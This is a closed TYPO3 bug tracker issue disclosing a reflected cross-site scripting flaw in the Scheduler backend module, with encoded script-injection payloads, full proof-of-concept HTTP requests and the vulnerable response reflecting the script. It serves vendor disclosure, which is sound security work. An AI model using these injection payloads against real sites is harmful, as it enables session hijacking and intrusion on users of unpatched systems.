Project

General

Profile

Actions

Bug #82079

closed

XSS in scheduler

Added by Oliver Hader over 7 years ago. Updated about 6 years ago.

Status:
Closed
Priority:
Should have
Assignee:
-
Category:
-
Target version:
-
Start date:
2017-08-10
Due date:
% Done:

100%

Estimated time:
TYPO3 Version:
6.2
PHP Version:
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

I would like to inform you about security issue that I have found on the plugin SCHEDULER of the cms TYPO3 (checked on version 8.7.3), specifically it is accessible in the "Scheduler" section of the Backend administrative console.

The plugin Scheduler of TYPO3 is resulted vulnerable to Reflected Cross-Site Scripting, for the requests to Add or Edit a task, specifically on the 2 parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".

Technical Details =================
Below is descripted the scenario to reproduce the security issue.

Proof of Concept:
To replicate the issue an authenticated user (with permission to create/edit tasks) have to click the button "Add-Task" or "Edit-Task" in the Scheduler area.
And so is sufficient to grab the request which is being passed to the server and add the payloads in the 2 vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D", so the submitted payloads are replicated on the response.

EXAMPLE
Payloads:
krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1
de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag

ORIGINAL REQUEST:
----------------------------------
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save

PoC REQUEST:
-----------------------
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

PoC RESPONSE:
--------------------------
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<label>Task group</label></abbr></span><div class="form-control-wrap"><select name="tx_scheduler[task_group]" id="task_class" class="form-control"><option value="0" title=""></option></select></div></div></div>
<div class="form-section"><div class="row"><div class="form-group col-sm-6" id="task_start_col"><label><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"><abbr class="t3-help-teaser">Start (HH:MM DD-MM-YYYY)</abbr></span></label><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"><input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"><input name="tx_scheduler[start]" value="15008874533rup3z"><script>alert(1)</script>yflbjwmu6m1" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_start_row"><span class="fa fa-calendar"></span></label></span></div></div></div>
<div class="form-group col-sm-6" id="task_end_col"><span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"><abbr class="t3-help-teaser"><label>End (HH:MM DD-MM-YYYY)</label></abbr></span><div class="form-control-wrap"><div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"><input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"><input name="tx_scheduler[end]" value="de6gi"><script>alert(2)</script>h3wq9ysmjag" type="hidden"><span class="input-group-btn"><label class="btn btn-default" for="tceforms-datetimefield-task_end_row"><span class="fa fa-calendar"></span></label></span></div></div></div></div></div>
[...]

Attached a screenshot of the PoC to better illustrate the vulnerability.

Vulnerable Versions:
TYPO3 8.7.3 and earlier

Checked on TYPO3/8.7.3

I have not received your response for the other 2 previous reporting (I hope to receive at least a response from you). Anyway I am always available if you need further explanations, kind regards.

Actions

Also available in: Atom PDF